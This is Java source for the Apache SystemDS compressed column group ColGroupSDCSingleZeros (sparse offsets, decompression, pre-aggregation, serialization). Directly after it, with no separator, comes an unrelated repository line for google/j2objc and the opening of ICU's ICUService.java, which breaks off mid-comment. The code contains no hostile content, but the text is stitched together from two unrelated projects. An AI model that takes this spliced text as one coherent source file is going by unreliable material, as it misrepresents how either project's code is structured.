/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.sysds.runtime.compress.colgroup; import java.io.DataInput; import java.io.DataOutput; import java.io.IOException; import java.util.Arrays; import java.util.List; import org.apache.commons.lang3.NotImplementedException; import org.apache.sysds.runtime.compress.CompressedMatrixBlock; import org.apache.sysds.runtime.compress.DMLCompressionException; import org.apache.sysds.runtime.compress.colgroup.ColGroupUtils.P; import org.apache.sysds.runtime.compress.colgroup.dictionary.Dictionary; import org.apache.sysds.runtime.compress.colgroup.dictionary.DictionaryFactory; import org.apache.sysds.runtime.compress.colgroup.dictionary.IDictionary; import org.apache.sysds.runtime.compress.colgroup.dictionary.MatrixBlockDictionary; import org.apache.sysds.runtime.compress.colgroup.dictionary.PlaceHolderDict; import org.apache.sysds.runtime.compress.colgroup.indexes.ColIndexFactory; import org.apache.sysds.runtime.compress.colgroup.indexes.IColIndex; import org.apache.sysds.runtime.compress.colgroup.mapping.MapToZero; import org.apache.sysds.runtime.compress.colgroup.offset.AIterator; import org.apache.sysds.runtime.compress.colgroup.offset.AOffset; import org.apache.sysds.runtime.compress.colgroup.offset.AOffset.OffsetSliceInfo; import org.apache.sysds.runtime.compress.colgroup.offset.AOffsetIterator; import org.apache.sysds.runtime.compress.colgroup.offset.OffsetEmpty; import org.apache.sysds.runtime.compress.colgroup.offset.OffsetFactory; import org.apache.sysds.runtime.compress.cost.ComputationCostEstimator; import org.apache.sysds.runtime.compress.estim.encoding.EncodingFactory; import org.apache.sysds.runtime.compress.estim.encoding.IEncode; import org.apache.sysds.runtime.compress.utils.IntArrayList; import org.apache.sysds.runtime.data.DenseBlock; import org.apache.sysds.runtime.data.SparseBlock; import org.apache.sysds.runtime.data.SparseBlockMCSR; import org.apache.sysds.runtime.functionobjects.Builtin; import org.apache.sysds.runtime.matrix.data.MatrixBlock; import org.apache.sysds.runtime.matrix.operators.BinaryOperator; import org.apache.sysds.runtime.matrix.operators.ScalarOperator; import org.apache.sysds.runtime.matrix.operators.UnaryOperator; /** * Column group that sparsely encodes the dictionary values. The idea is that all values is encoded with indexes except * the most common one. the most common one can be inferred by not being included in the indexes. If the values are very * sparse then the most common one is zero. * * This column group is handy in cases where sparse unsafe operations is executed on very sparse columns. Then the zeros * would be materialized in the group without any overhead. */ public class ColGroupSDCSingleZeros extends ASDCZero { private static final long serialVersionUID = 8033235615964315078L; private ColGroupSDCSingleZeros(IColIndex colIndices, int numRows, IDictionary dict, AOffset offsets, int[] cachedCounts) { super(colIndices, numRows, dict, offsets, cachedCounts); if(CompressedMatrixBlock.debug) { if(offsets.getSize() * 2 > numRows + 2 && !(dict instanceof PlaceHolderDict)) throw new DMLCompressionException("Wrong direction of SDCSingleZero compression should be other way " + numRows + " vs " + _indexes + "\n" + this); _indexes.verify(_indexes.getSize()); } } public static AColGroup create(IColIndex colIndices, int numRows, IDictionary dict, AOffset offsets, int[] cachedCounts) { if(dict == null || offsets instanceof OffsetEmpty) return new ColGroupEmpty(colIndices); else if(offsets.getSize() * 2 > numRows + 2 && !(dict instanceof PlaceHolderDict)) { AOffset rev = offsets.reverse(numRows); IDictionary empty = MatrixBlockDictionary.create(new MatrixBlock(1, colIndices.size(), true)); return ColGroupSDCSingle.create(colIndices, numRows, empty, dict.getValues(), rev, null); } else return new ColGroupSDCSingleZeros(colIndices, numRows, dict, offsets, cachedCounts); } @Override public CompressionType getCompType() { return CompressionType.SDC; } @Override public ColGroupType getColGroupType() { return ColGroupType.SDCSingleZeros; } @Override protected void decompressToDenseBlockDenseDictionary(DenseBlock db, int rl, int ru, int offR, int offC, double[] values) { final AIterator it = _indexes.getIterator(rl); if(it == null) return; else if(it.value() >= ru) return; // _indexes.cacheIterator(it, ru); else { decompressToDenseBlockDenseDictionaryWithProvidedIterator(db, rl, ru, offR, offC, values, it); // _indexes.cacheIterator(it, ru); } } @Override public void decompressToDenseBlockDenseDictionaryWithProvidedIterator(DenseBlock db, int rl, int ru, int offR, int offC, double[] values, AIterator it) { final int last = _indexes.getOffsetToLast(); if(it == null || it.value() >= ru || rl > last) return; else if(ru > _indexes.getOffsetToLast()) decompressToDenseBlockDenseDictionaryPost(db, rl, ru, offR, offC, values, it); else { if(_colIndexes.size() == 1 && db.getDim(1) == 1) decompressToDenseBlockDenseDictionaryPreSingleColOutContiguous(db, rl, ru, offR, offC, values[0], it); else decompressToDenseBlockDenseDictionaryPre(db, rl, ru, offR, offC, values, it); } } private void decompressToDenseBlockDenseDictionaryPost(DenseBlock db, int rl, int ru, int offR, int offC, double[] values, AIterator it) { final int maxOff = _indexes.getOffsetToLast(); final int nCol = _colIndexes.size(); int row = offR + it.value(); double[] c = db.values(row); int off = db.pos(row); for(int j = 0; j < nCol; j++) c[off + _colIndexes.get(j) + offC] += values[j]; while(it.value() < maxOff) { it.next(); row = offR + it.value(); c = db.values(row); off = db.pos(row); for(int j = 0; j < nCol; j++) c[off + _colIndexes.get(j) + offC] += values[j]; } } private void decompressToDenseBlockDenseDictionaryPreSingleColOutContiguous(DenseBlock db, int rl, int ru, int offR, int offC, double v, AIterator it) { final double[] c = db.values(0); int r = it.value(); while(r < ru) { c[offR + r] += v; r = it.next(); } } private void decompressToDenseBlockDenseDictionaryPre(DenseBlock db, int rl, int ru, int offR, int offC, double[] values, AIterator it) { final int nCol = _colIndexes.size(); int r = it.value(); while(r < ru) { final int row = offR + r; final double[] c = db.values(row); final int off = db.pos(row); for(int j = 0; j < nCol; j++) c[off + _colIndexes.get(j) + offC] += values[j]; r = it.next(); } } @Override protected void decompressToDenseBlockSparseDictionary(DenseBlock db, int rl, int ru, int offR, int offC, SparseBlock sb) { final AIterator it = _indexes.getIterator(rl); if(it == null) return; else if(it.value() >= ru) _indexes.cacheIterator(it, ru); final int last = _indexes.getOffsetToLast(); if(ru > last) decompressToDenseBlockSparseDictionaryPost(db, rl, ru, offR, offC, sb, it, last); else decompressToDenseBlockSparseDictionaryPre(db, rl, ru, offR, offC, sb, it); } private final void decompressToDenseBlockSparseDictionaryPost(DenseBlock db, int rl, int ru, int offR, int offC, SparseBlock sb, AIterator it, int last) { final int apos = sb.pos(0); final int alen = sb.size(0) + apos; final double[] avals = sb.values(0); final int[] aix = sb.indexes(0); while(true) { final int idx = offR + it.value(); final double[] c = db.values(idx); final int off = db.pos(idx) + offC; for(int j = apos; j < alen; j++) c[off + _colIndexes.get(aix[j])] += avals[j]; if(it.value() == last) return; it.next(); } } private final void decompressToDenseBlockSparseDictionaryPre(DenseBlock db, int rl, int ru, int offR, int offC, SparseBlock sb, AIterator it) { final int apos = sb.pos(0); final int alen = sb.size(0) + apos; final int[] aix = sb.indexes(0); final double[] avals = sb.values(0); while(it.isNotOver(ru)) { final int row = offR + it.value(); final double[] c = db.values(row); final int off = db.pos(row); for(int j = apos; j < alen; j++) c[off + _colIndexes.get(aix[j]) + offC] += avals[j]; it.next(); } _indexes.cacheIterator(it, ru); } @Override protected void decompressToSparseBlockSparseDictionary(SparseBlock ret, int rl, int ru, int offR, int offC, SparseBlock sb) { final AIterator it = _indexes.getIterator(rl); final int last = _indexes.getOffsetToLast(); if(it == null) return; else if(it.value() >= ru) _indexes.cacheIterator(it, ru); else if(ru > last) { final int apos = sb.pos(0); final int alen = sb.size(0) + apos; final int[] aix = sb.indexes(0); final double[] avals = sb.values(0); while(it.value() < last) { final int row = offR + it.value(); for(int j = apos; j < alen; j++) ret.append(row, _colIndexes.get(aix[j]) + offC, avals[j]); it.next(); } final int row = offR + it.value(); for(int j = apos; j < alen; j++) ret.append(row, _colIndexes.get(aix[j]) + offC, avals[j]); } else { final int apos = sb.pos(0); final int alen = sb.size(0) + apos; final int[] aix = sb.indexes(0); final double[] avals = sb.values(0); while(it.isNotOver(ru)) { final int row = offR + it.value(); for(int j = apos; j < alen; j++) ret.append(row, _colIndexes.get(aix[j]) + offC, avals[j]); it.next(); } _indexes.cacheIterator(it, ru); } } @Override protected void decompressToSparseBlockDenseDictionary(SparseBlock ret, int rl, int ru, int offR, int offC, double[] values) { final AIterator it = _indexes.getIterator(rl); if(it == null) return; else if(it.value() >= ru) _indexes.cacheIterator(it, ru); else if(ru > _indexes.getOffsetToLast()) { final int nCol = _colIndexes.size(); final int lastOff = _indexes.getOffsetToLast(); int row = offR + it.value(); for(int j = 0; j < nCol; j++) ret.append(row, _colIndexes.get(j) + offC, values[j]); while(it.value() < lastOff) { it.next(); row = offR + it.value(); for(int j = 0; j < nCol; j++) ret.append(row, _colIndexes.get(j) + offC, values[j]); } } else { final int nCol = _colIndexes.size(); while(it.isNotOver(ru)) { final int row = offR + it.value(); for(int j = 0; j < nCol; j++) ret.append(row, _colIndexes.get(j) + offC, values[j]); it.next(); } _indexes.cacheIterator(it, ru); } } @Override public double getIdx(int r, int colIdx) { final AIterator it = _indexes.getIterator(r); if(it == null || it.value() != r) return 0; return _dict.getValue(colIdx); } @Override protected void computeRowSums(double[] c, int rl, int ru, double[] preAgg) { computeRowSum(c, rl, ru, preAgg[0]); } protected void computeRowSum(double[] c, int rl, int ru, double def) { final AIterator it = _indexes.getIterator(rl); if(it == null) return; else if(it.value() > ru) _indexes.cacheIterator(it, ru); else if(ru > _indexes.getOffsetToLast()) { final int maxOff = _indexes.getOffsetToLast(); while(true) { c[it.value()] += def; if(it.value() == maxOff) break; it.next(); } } else { while(it.isNotOver(ru)) { c[it.value()] += def; it.next(); } _indexes.cacheIterator(it, ru); } } @Override protected void computeRowMxx(double[] c, Builtin builtin, int rl, int ru, double[] preAgg) { ColGroupSDCSingle.computeRowMxx(c, builtin, rl, ru, _indexes, _numRows, 0, preAgg[0]); } @Override protected void computeRowProduct(double[] c, int rl, int ru, double[] preAgg) { ColGroupSDCSingle.computeRowProduct(c, rl, ru, _indexes, _numRows, 0, preAgg[0]); } @Override public int[] getCounts(int[] counts) { counts[0] = _indexes.getSize(); return counts; } @Override protected void multiplyScalar(double v, double[] resV, int offRet, AIterator it) { _dict.multiplyScalar(v, resV, offRet, 0, _colIndexes); } @Override public void preAggregateDense(MatrixBlock m, double[] preAgg, int rl, int ru, int cl, int cu) { if(m.getDenseBlock().isContiguous()) preAggregateDenseContiguous(m, preAgg, rl, ru, cl, cu); else preAggregateDenseGeneric(m, preAgg, rl, ru, cl, cu); } @Override public void leftMMIdentityPreAggregateDense(MatrixBlock that, MatrixBlock ret, int rl, int ru, int cl, int cu) { throw new NotImplementedException(); } private void preAggregateDenseGeneric(MatrixBlock m, double[] preAgg, int rl, int ru, int cl, int cu) { final AIterator it = _indexes.getIterator(cl); final DenseBlock db = m.getDenseBlock(); final int nCol = m.getNumColumns(); if(it == null) return; else if(it.value() > cu) _indexes.cacheIterator(it, cu); else if(cu < _indexes.getOffsetToLast() + 1) { if(db.isContiguous(rl, ru)) { while(it.value() < cu) { final double[] vals = db.values(rl); final int start = it.value() + db.pos(rl); final int end = it.value() + db.pos(ru); for(int offOut = 0, off = start; off < end; offOut++, off += nCol) preAgg[offOut] += vals[off]; it.next(); } } else { throw new NotImplementedException(); } _indexes.cacheIterator(it, cu); } else { if(db.isContiguous(rl, ru)) { final double[] vals = db.values(rl); final int rlPos = db.pos(rl); final int ruPos = db.pos(ru); int of = it.value(); int start = of + rlPos; int end = of + ruPos; for(int offOut = 0, off = start; off < end; offOut++, off += nCol) preAgg[offOut] += vals[off]; while(of < _indexes.getOffsetToLast()) { it.next(); of = it.value(); start = of + rlPos; end = of + ruPos; for(int offOut = 0, off = start; off < end; offOut++, off += nCol) preAgg[offOut] += vals[off]; } } else { throw new NotImplementedException(); } } } private void preAggregateDenseContiguous(MatrixBlock m, double[] preAgg, int rl, int ru, int cl, int cu) { final AIterator it = _indexes.getIterator(cl); final double[] vals = m.getDenseBlockValues(); final int nCol = m.getNumColumns(); if(it == null) return; else if(it.value() > cu) _indexes.cacheIterator(it, cu); else if(cu < _indexes.getOffsetToLast() + 1) { while(it.value() < cu) { final int start = it.value() + nCol * rl; final int end = it.value() + nCol * ru; for(int offOut = 0, off = start; off < end; offOut++, off += nCol) preAgg[offOut] += vals[off]; it.next(); } _indexes.cacheIterator(it, cu); } else { int of = it.value(); int start = of + nCol * rl; int end = of + nCol * ru; for(int offOut = 0, off = start; off < end; offOut++, off += nCol) preAgg[offOut] += vals[off]; while(of < _indexes.getOffsetToLast()) { it.next(); of = it.value(); start = of + nCol * rl; end = of + nCol * ru; for(int offOut = 0, off = start; off < end; offOut++, off += nCol) preAgg[offOut] += vals[off]; } } } @Override public void preAggregateSparse(SparseBlock sb, double[] preAgg, int rl, int ru, int cl, int cu) { if(cl != 0 || cu < _indexes.getOffsetToLast()) { throw new NotImplementedException(); } final AOffsetIterator it = _indexes.getOffsetIterator(); if(rl == ru - 1) preAggregateSparseSingleRow(sb, preAgg, rl, _indexes.getOffsetToLast(), it); else preAggregateSparseMultiRow(sb, preAgg, rl, ru, _indexes.getOffsetToLast(), it); } private static void preAggregateSparseSingleRow(final SparseBlock sb, final double[] preAgg, final int r, final int last, final AOffsetIterator it) { if(sb.isEmpty(r)) return; final int apos = sb.pos(r); final int alen = sb.size(r) + apos; final int[] aix = sb.indexes(r); final double[] avals = sb.values(r); double ret = 0; int i = it.value(); int j = apos; while(i < last && j < alen) { final int idx = aix[j]; if(idx == i) { ret += avals[j++]; i = it.next(); } else if(idx < i) j++; else i = it.next(); } while(j < alen && aix[j] < last) j++; if(j < alen && aix[j] == last) ret += avals[j]; preAgg[0] = ret; } private static void preAggregateSparseMultiRow(final SparseBlock sb, final double[] preAgg, final int rl, final int ru, final int last, final AOffsetIterator it) { int i = it.value(); final int[] aOffs = new int[ru - rl]; // Initialize offsets for each row for(int r = rl; r < ru; r++) aOffs[r - rl] = sb.pos(r); while(i < last) { // while we are not done iterating for(int r = rl; r < ru; r++) { if(sb.isEmpty(r)) continue; final int off = r - rl; int apos = aOffs[off]; // current offset final int alen = sb.size(r) + sb.pos(r); final int[] aix = sb.indexes(r); while(apos < alen && aix[apos] < i)// increment all pointers to offset apos++; if(apos < alen && aix[apos] == i) preAgg[off] += sb.values(r)[apos]; aOffs[off] = apos; } i = it.next(); } // process final element for(int r = rl; r < ru; r++) { if(sb.isEmpty(r)) continue; final int off = r - rl; int apos = aOffs[off]; final int alen = sb.size(r) + sb.pos(r); final int[] aix = sb.indexes(r); while(apos < alen && aix[apos] < last) apos++; if(apos < alen && aix[apos] == last) preAgg[off] += sb.values(r)[apos]; aOffs[off] = apos; } } @Override public long estimateInMemorySize() { long size = super.estimateInMemorySize(); size += _indexes.getInMemorySize(); return size; } @Override public AColGroup scalarOperation(ScalarOperator op) { final double val0 = op.executeScalar(0); final boolean isSparseSafeOp = val0 == 0; final IDictionary nDict = _dict.applyScalarOp(op); if(isSparseSafeOp) return create(_colIndexes, _numRows, nDict, _indexes, getCachedCounts()); else { final double[] defaultTuple = new double[_colIndexes.size()]; Arrays.fill(defaultTuple, val0); return ColGroupSDCSingle.create(_colIndexes, _numRows, nDict, defaultTuple, _indexes, getCachedCounts()); } } @Override public AColGroup unaryOperation(UnaryOperator op) { final double val0 = op.fn.execute(0); final IDictionary nDict = _dict.applyUnaryOp(op); if(val0 == 0) return create(_colIndexes, _numRows, nDict, _indexes, getCachedCounts()); else { final double[] defaultTuple = new double[_colIndexes.size()]; Arrays.fill(defaultTuple, val0); return ColGroupSDCSingle.create(_colIndexes, _numRows, nDict, defaultTuple, _indexes, getCachedCounts()); } } @Override protected double computeMxx(double c, Builtin builtin) { c = builtin.execute(c, 0); return _dict.aggregate(c, builtin); } @Override protected void computeColMxx(double[] c, Builtin builtin) { for(int x = 0; x < _colIndexes.size(); x++) c[_colIndexes.get(x)] = builtin.execute(c[_colIndexes.get(x)], 0); _dict.aggregateCols(c, builtin, _colIndexes); } @Override public boolean containsValue(double pattern) { return (pattern == 0) || _dict.containsValue(pattern); } @Override public AColGroup binaryRowOpLeft(BinaryOperator op, double[] v, boolean isRowSafe) { if(isRowSafe) { IDictionary ret = _dict.binOpLeft(op, v, _colIndexes); return ColGroupSDCSingleZeros.create(_colIndexes, _numRows, ret, _indexes, getCachedCounts()); } else { IDictionary newDict = _dict.binOpLeft(op, v, _colIndexes); double[] defaultTuple = new double[_colIndexes.size()]; for(int i = 0; i < _colIndexes.size(); i++) defaultTuple[i] = op.fn.execute(v[_colIndexes.get(i)], 0); return ColGroupSDCSingle.create(_colIndexes, _numRows, newDict, defaultTuple, _indexes, getCachedCounts()); } } @Override public AColGroup binaryRowOpRight(BinaryOperator op, double[] v, boolean isRowSafe) { if(isRowSafe) { IDictionary ret = _dict.binOpRight(op, v, _colIndexes); return ColGroupSDCSingleZeros.create(_colIndexes, _numRows, ret, _indexes, getCachedCounts()); } else { IDictionary newDict = _dict.binOpRight(op, v, _colIndexes); double[] defaultTuple = new double[_colIndexes.size()]; for(int i = 0; i < _colIndexes.size(); i++) defaultTuple[i] = op.fn.execute(0, v[_colIndexes.get(i)]); return ColGroupSDCSingle.create(_colIndexes, _numRows, newDict, defaultTuple, _indexes, getCachedCounts()); } } @Override public void write(DataOutput out) throws IOException { super.write(out); _indexes.write(out); } public static ColGroupSDCSingleZeros read(DataInput in, int nRows) throws IOException { IColIndex cols = ColIndexFactory.read(in); IDictionary dict = DictionaryFactory.read(in); AOffset indexes = OffsetFactory.readIn(in); return new ColGroupSDCSingleZeros(cols, nRows, dict, indexes, null); } @Override public long getExactSizeOnDisk() { long ret = super.getExactSizeOnDisk(); ret += _indexes.getExactSizeOnDisk(); return ret; } @Override public boolean sameIndexStructure(AColGroupCompressed that) { if(that instanceof ColGroupSDCSingleZeros) { ColGroupSDCSingleZeros th = (ColGroupSDCSingleZeros) that; return th._indexes == _indexes; } else if(that instanceof ColGroupSDCSingle) { ColGroupSDCSingle th = (ColGroupSDCSingle) that; return th._indexes == _indexes; } else return false; } @Override protected AColGroup fixColIndexes(IColIndex newColIndex, int[] reordering) { return ColGroupSDCSingleZeros.create(newColIndex, getNumRows(), _dict.reorder(reordering), _indexes, getCachedCounts()); } @Override public void preAggregateThatDDCStructure(ColGroupDDC that, Dictionary ret) { final AOffsetIterator itThis = _indexes.getOffsetIterator(); final int nCol = that._colIndexes.size(); final int finalOffThis = _indexes.getOffsetToLast(); final double[] rV = ret.getValues(); if(nCol == 1) preAggregateThatDDCStructureSingleCol(that, rV, itThis, finalOffThis); else preAggregateThatDDCStructureMultiCol(that, rV, itThis, finalOffThis, nCol); } private void preAggregateThatDDCStructureSingleCol(ColGroupDDC that, double[] rV, AOffsetIterator itThis, int finalOffThis) { double rv = 0; final double[] tV = that._dict.getValues(); while(true) { final int v = itThis.value(); rv += tV[that._data.getIndex(v)]; if(v >= finalOffThis) break; itThis.next(); } rV[0] += rv; } private void preAggregateThatDDCStructureMultiCol(ColGroupDDC that, double[] rV, AOffsetIterator itThis, int finalOffThis, int nCol) { while(true) { final int v = itThis.value(); final int fr = that._data.getIndex(v); that._dict.addToEntry(rV, fr, 0, nCol); if(v >= finalOffThis) break; itThis.next(); } } @Override public void preAggregateThatSDCZerosStructure(ColGroupSDCZeros that, Dictionary ret) { final AIterator itThat = that._indexes.getIterator(); final AOffsetIterator itThis = _indexes.getOffsetIterator(); final int nCol = that._colIndexes.size(); final int finalOffThis = _indexes.getOffsetToLast(); final int finalOffThat = that._indexes.getOffsetToLast(); final double[] rV = ret.getValues(); if(nCol == 1) preAggregateThatSDCZerosStructureSingleCol(that, rV, itThat, finalOffThat, itThis, finalOffThis); else preAggregateThatSDCZerosStructureMultiCol(that, rV, itThat, finalOffThat, itThis, finalOffThis, nCol); } private void preAggregateThatSDCZerosStructureSingleCol(ColGroupSDCZeros that, double[] rV, AIterator itThat, int finalOffThat, AOffsetIterator itThis, int finalOffThis) { double rv = 0; final double[] tV = that._dict.getValues(); while(true) { final int tv = itThat.value(); final int v = itThis.value(); if(tv == v) { rv += tV[that._data.getIndex(itThat.getDataIndex())]; if(tv >= finalOffThat || v >= finalOffThis) break; itThat.next(); itThis.next(); } else if(tv < v) { if(tv >= finalOffThat) break; itThat.next(); } else { if(v >= finalOffThis) break; itThis.next(); } } rV[0] += rv; } private void preAggregateThatSDCZerosStructureMultiCol(ColGroupSDCZeros that, double[] rV, AIterator itThat, int finalOffThat, AOffsetIterator itThis, int finalOffThis, int nCol) { while(true) { final int tv = itThat.value(); final int v = itThis.value(); if(tv == v) { that._dict.addToEntry(rV, that._data.getIndex(itThat.getDataIndex()), 0, nCol); if(tv >= finalOffThat || v >= finalOffThis) break; itThat.next(); itThis.next(); } else if(tv < v) { if(tv >= finalOffThat) break; itThat.next(); } else { if(v >= finalOffThis) break; itThis.next(); } } } @Override public void preAggregateThatSDCSingleZerosStructure(ColGroupSDCSingleZeros that, Dictionary ret) { final int nCol = that._colIndexes.size(); final AOffsetIterator itThis = _indexes.getOffsetIterator(); final AOffsetIterator itThat = that._indexes.getOffsetIterator(); final int finalOffThis = _indexes.getOffsetToLast(); final int finalOffThat = that._indexes.getOffsetToLast(); int count = 0; int tv = itThat.value(); int v = itThis.value(); while(tv < finalOffThat && v < finalOffThis) { if(tv == v) { count++; tv = itThat.next(); v = itThis.next(); } else if(tv < v) tv = itThat.next(); else v = itThis.next(); } while(tv < finalOffThat && tv < v) tv = itThat.next(); while(v < finalOffThis && v < tv) v = itThis.next(); if(tv == v) count++; that._dict.addToEntry(ret.getValues(), 0, 0, nCol, count); } @Override protected void preAggregateThatRLEStructure(ColGroupRLE that, Dictionary ret) { final int finalOff = _indexes.getOffsetToLast(); final double[] v = ret.getValues(); final int nv = that.getNumValues(); final int nCol = that._colIndexes.size(); for(int k = 0; k < nv; k++) { final AOffsetIterator itThis = _indexes.getOffsetIterator(); final int blen = that._ptr[k + 1]; for(int apos = that._ptr[k], rs = 0, re = 0; apos < blen; apos += 2) { rs = re + that._data[apos]; re = rs + that._data[apos + 1]; // if index is later than run continue if(itThis.value() >= re || rs == re || rs > finalOff) continue; // while lower than run iterate through while(itThis.value() < rs && itThis.value() != finalOff) itThis.next(); // process inside run for(int rix = itThis.value(); rix < re; rix = itThis.value()) { // nice skip inside runs that._dict.addToEntry(v, k, 0, nCol); if(itThis.value() == finalOff) // break if final. break; itThis.next(); } } } } @Override public int getPreAggregateSize() { return 1; } @Override public AColGroup replace(double pattern, double replace) { IDictionary replaced = _dict.replace(pattern, replace, _colIndexes.size()); if(pattern == 0) { double[] defaultTuple = new double[_colIndexes.size()]; for(int i = 0; i < _colIndexes.size(); i++) defaultTuple[i] = replace; return ColGroupSDCSingle.create(_colIndexes, _numRows, replaced, defaultTuple, _indexes, getCachedCounts()); } return copyAndSet(replaced); } @Override protected void computeProduct(double[] c, int nRows) { c[0] = 0; } @Override protected void computeColProduct(double[] c, int nRows) { for(int i = 0; i < _colIndexes.size(); i++) c[_colIndexes.get(i)] = 0; } @Override public double getCost(ComputationCostEstimator e, int nRows) { final int nVals = getNumValues(); final int nCols = getNumCols(); final int nRowsScanned = getCounts()[0]; return e.getCost(nRows, nRowsScanned, nCols, nVals, _dict.getSparsity()); } @Override protected int numRowsToMultiply() { return getCounts()[0]; } @Override protected AColGroup allocateRightMultiplication(MatrixBlock right, IColIndex colIndexes, IDictionary preAgg) { if(colIndexes != null && preAgg != null) return create(colIndexes, _numRows, preAgg, _indexes, getCachedCounts()); else return null; } @Override public AColGroup sliceRows(int rl, int ru) { OffsetSliceInfo off = _indexes.slice(rl, ru); if(off.lIndex == -1) return null; if(CompressedMatrixBlock.debug) { if(off.offsetSlice.getOffsetToFirst() < 0 || off.offsetSlice.getOffsetToLast() > ru - rl) throw new DMLCompressionException("Failed to slice : " + rl + " " + ru + " in: " + this); } return create(_colIndexes, ru - rl, _dict, off.offsetSlice, null); } @Override protected AColGroup copyAndSet(IColIndex colIndexes, IDictionary newDictionary) { return create(colIndexes, _numRows, newDictionary, _indexes, getCachedCounts()); } @Override public AColGroup append(AColGroup g) { return null; } @Override public AColGroup appendNInternal(AColGroup[] g, int blen, int rlen) { for(int i = 1; i < g.length; i++) { final AColGroup gs = g[i]; if(!_colIndexes.equals(gs._colIndexes)) { LOG.warn("Not same columns therefore not appending \n" + _colIndexes + "\n\n" + gs._colIndexes); return null; } if(!(gs instanceof AOffsetsGroup)) { LOG.warn("Not SDCFOR but " + gs.getClass().getSimpleName()); return null; } if(gs instanceof ColGroupSDCSingleZeros) { final ColGroupSDCSingleZeros gc = (ColGroupSDCSingleZeros) gs; if(!gc._dict.equals(_dict)) { LOG.warn("Not same Dictionaries therefore not appending \n" + _dict + "\n\n" + gc._dict); return null; } } } AOffset no = _indexes.appendN(Arrays.copyOf(g, g.length, AOffsetsGroup[].class), blen); return create(_colIndexes, rlen, _dict, no, null); } @Override public AColGroup recompress() { return this; } @Override public IEncode getEncoding() { return EncodingFactory.create(new MapToZero(getCounts()[0]), _indexes, _numRows); } @Override public int getNumberOffsets() { return getCounts()[0]; } @Override protected void sparseSelection(MatrixBlock selection, P[] points, MatrixBlock ret, int rl, int ru) { throw new NotImplementedException(); } @Override protected void denseSelection(MatrixBlock selection, P[] points, MatrixBlock ret, int rl, int ru) { throw new NotImplementedException(); } protected void decompressToDenseBlockTransposedSparseDictionary(DenseBlock db, int rl, int ru, SparseBlock sb) { throw new NotImplementedException(); } @Override protected void decompressToDenseBlockTransposedDenseDictionary(DenseBlock db, int rl, int ru, double[] dict) { throw new NotImplementedException(); } @Override protected void decompressToSparseBlockTransposedSparseDictionary(SparseBlockMCSR db, SparseBlock sb, int nColOut) { throw new NotImplementedException(); } @Override protected void decompressToSparseBlockTransposedDenseDictionary(SparseBlockMCSR db, double[] dict, int nColOut) { throw new NotImplementedException(); } @Override public AColGroupCompressed combineWithSameIndex(int nRow, int nCol, AColGroup right) { ColGroupSDCSingleZeros rightSDC = ((ColGroupSDCSingleZeros) right); IDictionary b = rightSDC.getDictionary(); IDictionary combined = DictionaryFactory.cBindDictionaries(_dict, b, this.getNumCols(), right.getNumCols()); IColIndex combinedColIndex = _colIndexes.combine(right.getColIndices().shift(nCol)); return new ColGroupSDCSingleZeros(combinedColIndex, this.getNumRows(), combined, _indexes, getCachedCounts()); } @Override public AColGroupCompressed combineWithSameIndex(int nRow, int nCol, List<AColGroup> right) { final IDictionary combined = combineDictionaries(nCol, right); final IColIndex combinedColIndex = combineColIndexes(nCol, right); // return new ColGroupDDC(combinedColIndex, combined, _data, getCachedCounts()); return new ColGroupSDCSingleZeros(combinedColIndex, this.getNumRows(), combined, _indexes, getCachedCounts()); } @Override public AColGroup[] splitReshape(int multiplier, int nRow, int nColOrg) { IntArrayList[] splitOffs = new IntArrayList[multiplier]; for(int i = 0; i < multiplier; i++) splitOffs[i] = new IntArrayList(); AIterator it = _indexes.getIterator(); final int last = _indexes.getOffsetToLast(); while(it.value() != last) { final int v = it.value(); // offset final int outV = v / multiplier; final int outM = v % multiplier; splitOffs[outM].appendValue(outV); it.next(); } // last value final int v = it.value(); final int outV = v / multiplier; final int outM = v % multiplier; splitOffs[outM].appendValue(outV); // iterate through all rows. AOffset[] offs = new AOffset[multiplier]; for(int i = 0; i < multiplier; i++) offs[i] = OffsetFactory.createOffset(splitOffs[i]); // assign columns AColGroup[] res = new AColGroup[multiplier]; for(int i = 0; i < multiplier; i++) { final IColIndex ci = i == 0 ? _colIndexes : _colIndexes.shift(i * nColOrg); res[i] = create(ci, _numRows / multiplier, _dict, offs[i], null); } return res; } @Override public String toString() { StringBuilder sb = new StringBuilder(); sb.append(super.toString()); sb.append(String.format("\n%15s", "Indexes: ")); sb.append(_indexes.toString()); return sb.toString(); } }
google/j2objc
35,914
jre_emul/android/platform/external/icu/android_icu4j/src/main/java/android/icu/impl/ICUService.java
/* GENERATED SOURCE. DO NOT MODIFY. */ // © 2016 and later: Unicode, Inc. and others. // License & terms of use: http://www.unicode.org/copyright.html#License /** ******************************************************************************* * Copyright (C) 2001-2016, International Business Machines Corporation and * others. All Rights Reserved. ******************************************************************************* */ package android.icu.impl; import java.util.ArrayList; import java.util.Collections; import java.util.Comparator; import java.util.EventListener; import java.util.HashMap; import java.util.HashSet; import java.util.Iterator; import java.util.List; import java.util.ListIterator; import java.util.Map; import java.util.Map.Entry; import java.util.Set; import java.util.SortedMap; import java.util.TreeMap; import java.util.concurrent.ConcurrentHashMap; import android.icu.util.ULocale; import android.icu.util.ULocale.Category; /** * <p>A Service provides access to service objects that implement a * particular service, e.g. transliterators. Users provide a String * id (for example, a locale string) to the service, and get back an * object for that id. Service objects can be any kind of object. * The service object is cached and returned for later queries, so * generally it should not be mutable, or the caller should clone the * object before modifying it.</p> * * <p>Services 'canonicalize' the query id and use the canonical id to * query for the service. The service also defines a mechanism to * 'fallback' the id multiple times. Clients can optionally request * the actual id that was matched by a query when they use an id to * retrieve a service object.</p> * * <p>Service objects are instantiated by Factory objects registered with * the service. The service queries each Factory in turn, from most recently * registered to earliest registered, until one returns a service object. * If none responds with a service object, a fallback id is generated, * and the process repeats until a service object is returned or until * the id has no further fallbacks.</p> * * <p>Factories can be dynamically registered and unregistered with the * service. When registered, a Factory is installed at the head of * the factory list, and so gets 'first crack' at any keys or fallback * keys. When unregistered, it is removed from the service and can no * longer be located through it. Service objects generated by this * factory and held by the client are unaffected.</p> * * <p>ICUService uses Keys to query factories and perform * fallback. The Key defines the canonical form of the id, and * implements the fallback strategy. Custom Keys can be 